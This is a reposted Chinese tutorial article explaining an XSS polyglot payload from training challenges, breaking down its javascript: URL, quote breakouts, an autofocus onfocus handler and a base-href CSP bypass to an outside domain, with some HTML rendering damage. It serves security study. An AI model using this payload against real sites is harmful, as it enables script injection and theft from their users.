多语言解决了大部分训练 XSS 肌肉挑战
来源:dev.to
时间:2024-09-15 08:39:38
116浏览
收藏
来到golang学习网的大家,相信都是编程学习爱好者,希望在这里学习文章相关编程知识。下面本篇文章就来带大家聊聊《多语言解决了大部分训练 XSS 肌肉挑战》,介绍一下,希望对大家的知识积累有所帮助,助力实战开发!
javascript://%250aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*
\74k
核心理念:
该有效负载旨在通过在各种 html 上下文中工作来绕过多个 xss 过滤器和安全机制。它结合使用 html 和 javascript 技巧以多种方式注入恶意负载,例如alert()函数。
顶级概念:
多语言基础知识:
多语言是一种可以在多个上下文中执行的有效负载,通常在 html、属性或 javascript 上下文中执行,使其更适合利用 xss 漏洞。
此有效负载的目标是注入 javascript 并跨多个上下文执行警报(1),同时绕过过滤器。
多语言部分:
使用可选链接执行 javascript:
javascript://%250aalert?.(1)//
javascript 协议会触发浏览器中从 url 协议解释 javascript 的负载。
%250a 是换行符 (n) 的 url 编码形式,用于绕过 url 验证或转义过滤器。
alert?.(1) 是 javascript 中的可选链接语法。如果警报存在,它会执行alert(1),绕过对直接调用alert()的严格检查。
// 将其余有效负载作为注释终止以避免错误。
html 标签细分:
本节尝试突破各种 html 标签,如
、<style>、<script>、<textarea> 等。<br>
它提前结束标签(</...>),以便 javascript 可以在标签之后立即执行,绕过基于标签上下文的过滤或限制。<br>
它很紧凑,因为它没有正确关闭每个标签;只需一个结束符号 (>) 就足够了。<br>
报价突破:<br></p>
<pre class="brush:php;toolbar:false">/*'/*\'/*"/*\"/*\/%26apos;)/<!-->`
</pre>
<p>此部分处理打破引号上下文(“、'、`)。它使用 javascript 注释(/.../)来注入和终止可能由过滤器启动的多行注释块。<br>
/<em>...</em>/ 对于多行注释和忽略过滤器检查很有用。<br>
%26apos;) 是 ' 的 html 实体转义代码,用于打破使用 html 实体进行清理的属性或字符串上下文。<br>
事件处理程序和执行:</p>
<p>`<br>
74k<k/contenteditable/autofocus/onfocus=/**/{(alert)(1)}//><br>
`<br>
74k<k 是插入任意标签的技巧,其中 74 是 < 的八进制表示形式。这可以绕过通过将 < 转换为八进制实体来清理的过滤器。<br>
k 是任意标签(可以是任何字符),具有 contenteditable、autofocus 和 onfocus 属性。<br>
焦点=/**/{(alert)(1)} 确保当元素获得焦点时,执行alert(1)函数。<br>
高级规避技术:</p>
<p>`<br>
<base/href=//x55.is76--><br>
`<br>
<base>用于csp绕过。如果基本 url 设置为 //x55.is 等恶意域,则对脚本或资产的相对 url 引用可以触发跨源请求,从而执行外部恶意脚本。<br>
/76 是 > 的八进制代码,它用于正确关闭标签,同时绕过转义 < 和 > 的过滤器。这是八进制转义符转换回字符的技巧的一部分。<br>
html 注释插入:</p>
<p><!--> 是一个简单的 html 注释注入,它结束由过滤器启动的任何 html 注释块,从而允许有效负载转义上下文。<br>
多语言逻辑:<br>
绕过 html 过滤器:多语言使用标签结束、引号突破和事件处理程序来转义多个 html 标签并在不同的上下文中执行 javascript。<br>
绕过 javascript 过滤器:通过注释技术 (/<em>...</em>/, //) 和引号转义,它可以处理多行脚本并防止语法错误。<br>
过滤器规避:通过使用 html 实体、可选链接和八进制转义,它绕过了常见的清理过滤器和 csp 规则。<br>
思维导图摘要:<br>
多语言核心:<br>
javascript 执行(警报?.(1))<br>
html 上下文突破 ()<br>
javascript 字符串注入:<br>
转义引号 (/<em>'/</em>'/<em>"/</em>)<br>
内联注释和多行转义 (//, /<em>...</em>/)<br>
html 标签规避:<br>
标记关闭突破 ()<br>
使用事件处理程序 () 进行任意标签注入<br>
高级技巧:<br>
< 和 > 的八进制编码(74 和 76)<br>
使用外部 url 绕过 csp (base/href=//x55.is)<br>
最终注射:</p>
<blockquote>
<p>跨多个浏览器和场景的混合上下文多语言触发。<br>
这种多语言在打破多个上下文、逃避 javascript 字符串处理和 html 标签闭包以及在两者中执行方面非常有效</p>
</blockquote>
<p>本篇关于《多语言解决了大部分训练 XSS 肌肉挑战》的介绍就到此结束啦,但是学无止境,想要了解学习更多关于文章的相关知识,请关注golang学习网公众号!</p> </div>
<div class="labsList">
</div>
<div class="articleStatement">
<span class="aRed">声明:</span><b>本文转载于:dev.to 如有侵犯,请联系<a href="javascript:;" class="aRed">study_golang@163.com</a>删除</b>
</div>
</div>
<!-- 最新阅读 -->
<div class="contBoxNor">
<div class="contTit">
<div class="tit">相关阅读</div>
<a href="/articlelist.html" class="more">更多></a>
</div>
<ul class="latestReadList">
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 1年前 |
<a href="javascript:;" class="aLightGray" title="CSS">CSS</a>
<a href="javascript:;" class="aLightGray" title="优化">优化</a>
<a href="javascript:;" class="aLightGray" title="体验">体验</a>
</div>
<div class="tit lineOverflow"><a href="/article/72840.html" title="优化用户界面体验的秘密武器:CSS开发项目经验大揭秘" class="aBlack">优化用户界面体验的秘密武器:CSS开发项目经验大揭秘</a></div>
<div class="opt">
<span><i class="view"></i>501</span>
<span class="collectBtn user_collection" data-id="72840" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 1年前 |
<a href="javascript:;" class="aLightGray" title="图片轮播">图片轮播</a>
<a href="javascript:;" class="aLightGray" title="微信小程序">微信小程序</a>
<a href="javascript:;" class="aLightGray" title="特效">特效</a>
</div>
<div class="tit lineOverflow"><a href="/article/76259.html" title="使用微信小程序实现图片轮播特效" class="aBlack">使用微信小程序实现图片轮播特效</a></div>
<div class="opt">
<span><i class="view"></i>501</span>
<span class="collectBtn user_collection" data-id="76259" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 1年前 |
<a href="javascript:;" class="aLightGray" title="sessionStorage">sessionStorage</a>
<a href="javascript:;" class="aLightGray" title="存储能力">存储能力</a>
<a href="javascript:;" class="aLightGray" title="限制解析">限制解析</a>
</div>
<div class="tit lineOverflow"><a href="/article/83771.html" title="解析sessionStorage的存储能力与限制" class="aBlack">解析sessionStorage的存储能力与限制</a></div>
<div class="opt">
<span><i class="view"></i>501</span>
<span class="collectBtn user_collection" data-id="83771" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 1年前 |
<a href="javascript:;" class="aLightGray" title="团队合作">团队合作</a>
<a href="javascript:;" class="aLightGray" title="冒泡事件">冒泡事件</a>
<a href="javascript:;" class="aLightGray" title="促进作用">促进作用</a>
</div>
<div class="tit lineOverflow"><a href="/article/85057.html" title="探索冒泡活动对于团队合作的推动力" class="aBlack">探索冒泡活动对于团队合作的推动力</a></div>
<div class="opt">
<span><i class="view"></i>501</span>
<span class="collectBtn user_collection" data-id="85057" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 1年前 |
</div>
<div class="tit lineOverflow"><a href="/article/91359.html" title="UI设计中为何选择绝对定位的智慧之道" class="aBlack">UI设计中为何选择绝对定位的智慧之道</a></div>
<div class="opt">
<span><i class="view"></i>501</span>
<span class="collectBtn user_collection" data-id="91359" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
</ul>
</div>
<!-- 最新阅读 -->
<div class="contBoxNor">
<div class="contTit">
<div class="tit">最新阅读</div>
<a href="/articlelist.html" class="more">更多></a>
</div>
<ul class="latestReadList">
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 3小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204198.html" title="JavaScript数组元素总和的计算技巧" class="aBlack">JavaScript数组元素总和的计算技巧</a></div>
<div class="opt">
<span><i class="view"></i>143</span>
<span class="collectBtn user_collection" data-id="204198" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 3小时前 |
<a href="javascript:;" class="aLightGray" title="window.location">window.location</a>
<a href="javascript:;" class="aLightGray" title="window.open">window.open</a>
<a href="javascript:;" class="aLightGray" title="window.location.replace">window.location.replace</a>
<a href="javascript:;" class="aLightGray" title="window.location.assign">window.location.assign</a>
</div>
<div class="tit lineOverflow"><a href="/article/204192.html" title="JavaScript页面跳转技巧与代码实现" class="aBlack">JavaScript页面跳转技巧与代码实现</a></div>
<div class="opt">
<span><i class="view"></i>184</span>
<span class="collectBtn user_collection" data-id="204192" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 3小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204189.html" title="JavaScript数组求和的实用技巧" class="aBlack">JavaScript数组求和的实用技巧</a></div>
<div class="opt">
<span><i class="view"></i>407</span>
<span class="collectBtn user_collection" data-id="204189" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 4小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204182.html" title="JavaScript中Array.prototype.reduceRight使用及示例" class="aBlack">JavaScript中Array.prototype.reduceRight使用及示例</a></div>
<div class="opt">
<span><i class="view"></i>273</span>
<span class="collectBtn user_collection" data-id="204182" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 4小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204171.html" title="JavaScript音频可视化实现的独门技巧" class="aBlack">JavaScript音频可视化实现的独门技巧</a></div>
<div class="opt">
<span><i class="view"></i>334</span>
<span class="collectBtn user_collection" data-id="204171" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 4小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204170.html" title="JavaScript中的闭包详解及应用" class="aBlack">JavaScript中的闭包详解及应用</a></div>
<div class="opt">
<span><i class="view"></i>353</span>
<span class="collectBtn user_collection" data-id="204170" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 4小时前 |
<a href="javascript:;" class="aLightGray" title="性能优化">性能优化</a>
<a href="javascript:;" class="aLightGray" title="事件冒泡">事件冒泡</a>
<a href="javascript:;" class="aLightGray" title="事件委托">事件委托</a>
<a href="javascript:;" class="aLightGray" title="addEventListener">addEventListener</a>
<a href="javascript:;" class="aLightGray" title="移除监听器">移除监听器</a>
</div>
<div class="tit lineOverflow"><a href="/article/204169.html" title="JavaScript按钮点击事件监听的简易技巧" class="aBlack">JavaScript按钮点击事件监听的简易技巧</a></div>
<div class="opt">
<span><i class="view"></i>311</span>
<span class="collectBtn user_collection" data-id="204169" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 5小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204166.html" title="JavaScriptWebWorkers使用指南及示例代码" class="aBlack">JavaScriptWebWorkers使用指南及示例代码</a></div>
<div class="opt">
<span><i class="view"></i>315</span>
<span class="collectBtn user_collection" data-id="204166" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 5小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204165.html" title="Vue.js中CompositionAPI与OptionsAPI对比使用" class="aBlack">Vue.js中CompositionAPI与OptionsAPI对比使用</a></div>
<div class="opt">
<span><i class="view"></i>151</span>
<span class="collectBtn user_collection" data-id="204165" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 5小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204160.html" title="call与apply在JavaScript中的区别详解" class="aBlack">call与apply在JavaScript中的区别详解</a></div>
<div class="opt">
<span><i class="view"></i>238</span>
<span class="collectBtn user_collection" data-id="204160" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 5小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204150.html" title="JavaScript中Array.prototype.reduceRight使用及示例" class="aBlack">JavaScript中Array.prototype.reduceRight使用及示例</a></div>
<div class="opt">
<span><i class="view"></i>420</span>
<span class="collectBtn user_collection" data-id="204150" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
<li>
<div class="info">
<a href="/articlelist/19_new_0_1.html" class="aLightGray" title="文章">文章</a> ·
<a href="/articlelist/88_new_0_1.html" class="aLightGray" title="前端">前端</a>
| 5小时前 |
</div>
<div class="tit lineOverflow"><a href="/article/204144.html" title="Vue.jsSSR实现攻略:服务端渲染详解" class="aBlack">Vue.jsSSR实现攻略:服务端渲染详解</a></div>
<div class="opt">
<span><i class="view"></i>472</span>
<span class="collectBtn user_collection" data-id="204144" data-type="article" title="收藏"><i class="collect"></i>收藏</span>
</div>
</li>
</ul>
</div>
<!-- 课程推荐 -->
<div class="contBoxNor">
<div class="contTit">
<div class="tit">课程推荐</div>
<a href="/courselist.html" class="more">更多></a>
</div>
<ul class="classRecomList">
<li>
<a href="/course/9.html" title="前端进阶之JavaScript设计模式" class="img_box">
<img src="/uploads/20221222/52fd0f23a454c71029c2c72d206ed815.jpg" onerror="this.onerror='';this.src='/assets/images/moren/morentu.png'" alt="前端进阶之JavaScript设计模式">
</a>
<dl>
<dt class="lineOverflow">
前端进阶之JavaScript设计模式 </dt>
<dd class="cont1 lineOverflow">设计模式是开发人员在软件开发过程中面临一般问题时的解决方案,代表了最佳的实践。本课程的主打内容包括JS常见设计模式以及具体应用场景,打造一站式知识长龙服务,适合有JS基础的同学学习。</dd>
<dd class="cont2">
<a href="/course/9.html" title="前端进阶之JavaScript设计模式" class="toStudy">立即学习</a>
<span>542次学习</span>
</dd>
</dl>
</li>
<li>
<a href="/course/2.html" title="GO语言核心编程课程" class="img_box">
<img src="/uploads/20221221/634ad7404159bfefc6a54a564d437b5f.png" onerror="this.onerror='';this.src='/assets/images/moren/morentu.png'" alt="GO语言核心编程课程">
</a>
<dl>
<dt class="lineOverflow">
GO语言核心编程课程 </dt>
<dd class="cont1 lineOverflow">本课程采用真实案例,全面具体可落地,从理论到实践,一步一步将GO核心编程技术、编程思想、底层实现融会贯通,使学习者贴近时代脉搏,做IT互联网时代的弄潮儿。</dd>
<dd class="cont2">
<a href="/course/2.html" title="GO语言核心编程课程" class="toStudy">立即学习</a>
<span>508次学习</span>
</dd>
</dl>
</li>
<li>
<a href="/course/74.html" title="简单聊聊mysql8与网络通信" class="img_box">
<img src="/uploads/20240103/bad35fe14edbd214bee16f88343ac57c.png" onerror="this.onerror='';this.src='/assets/images/moren/morentu.png'" alt="简单聊聊mysql8与网络通信">
</a>
<dl>
<dt class="lineOverflow">
简单聊聊mysql8与网络通信 </dt>
<dd class="cont1 lineOverflow">如有问题加微信:Le-studyg;在课程中,我们将首先介绍MySQL8的新特性,包括性能优化、安全增强、新数据类型等,帮助学生快速熟悉MySQL8的最新功能。接着,我们将深入解析MySQL的网络通信机制,包括协议、连接管理、数据传输等,让</dd>
<dd class="cont2">
<a href="/course/74.html" title="简单聊聊mysql8与网络通信" class="toStudy">立即学习</a>
<span>497次学习</span>
</dd>
</dl>
</li>
<li>
<a href="/course/57.html" title="JavaScript正则表达式基础与实战" class="img_box">
<img src="/uploads/20221226/bbe4083bb3cb0dd135fb02c31c3785fb.jpg" onerror="this.onerror='';this.src='/assets/images/moren/morentu.png'" alt="JavaScript正则表达式基础与实战">
</a>
<dl>
<dt class="lineOverflow">
JavaScript正则表达式基础与实战 </dt>
<dd class="cont1 lineOverflow">在任何一门编程语言中,正则表达式,都是一项重要的知识,它提供了高效的字符串匹配与捕获机制,可以极大的简化程序设计。</dd>
<dd class="cont2">
<a href="/course/57.html" title="JavaScript正则表达式基础与实战" class="toStudy">立即学习</a>
<span>487次学习</span>
</dd>
</dl>
</li>
<li>
<a href="/course/28.html" title="从零制作响应式网站—Grid布局" class="img_box">
<img src="/uploads/20221223/ac110f88206daeab6c0cf38ebf5fe9ed.jpg" onerror="this.onerror='';this.src='/assets/images/moren/morentu.png'" alt="从零制作响应式网站—Grid布局">
</a>
<dl>
<dt class="lineOverflow">
从零制作响应式网站—Grid布局 </dt>
<dd class="cont1 lineOverflow">本系列教程将展示从零制作一个假想的网络科技公司官网,分为导航,轮播,关于我们,成功案例,服务流程,团队介绍,数据部分,公司动态,底部信息等内容区块。网站整体采用CSSGrid布局,支持响应式,有流畅过渡和展现动画。</dd>
<dd class="cont2">
<a href="/course/28.html" title="从零制作响应式网站—Grid布局" class="toStudy">立即学习</a>
<span>484次学习</span>
</dd>
</dl>
</li>
</ul>
</div>
</div>
<!-- footer -->
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<div class="footer">
<ul>
<li ><a href="/" class="aLightGray"><em class="material-icons">home</em><span>首页</span></a></li>
<li class="curr"><a href="/articlelist.html" class="aLightGray"><em class="material-icons">menu_book</em><span>阅读</span></a></li>
<li ><a href="/courselist.html" class="aLightGray"><em class="material-icons">school</em><span>课程</span></a></li>
<li ><a href="/ai.html" class="aLightGray"><em class="material-icons">smart_toy</em><span>AI助手</span></a></li>
<li ><a href="/user.html" class="aLightGray"><em class="material-icons">person</em><span>我的</span></a></li>
</ul>
</div>
<script src="/assets/js/require.js" data-main="/assets/js/require-frontend.js?v=1671101972"></script>
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?3dc5666f6478c7bf39cd5c91e597423d";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
</body>
</html> 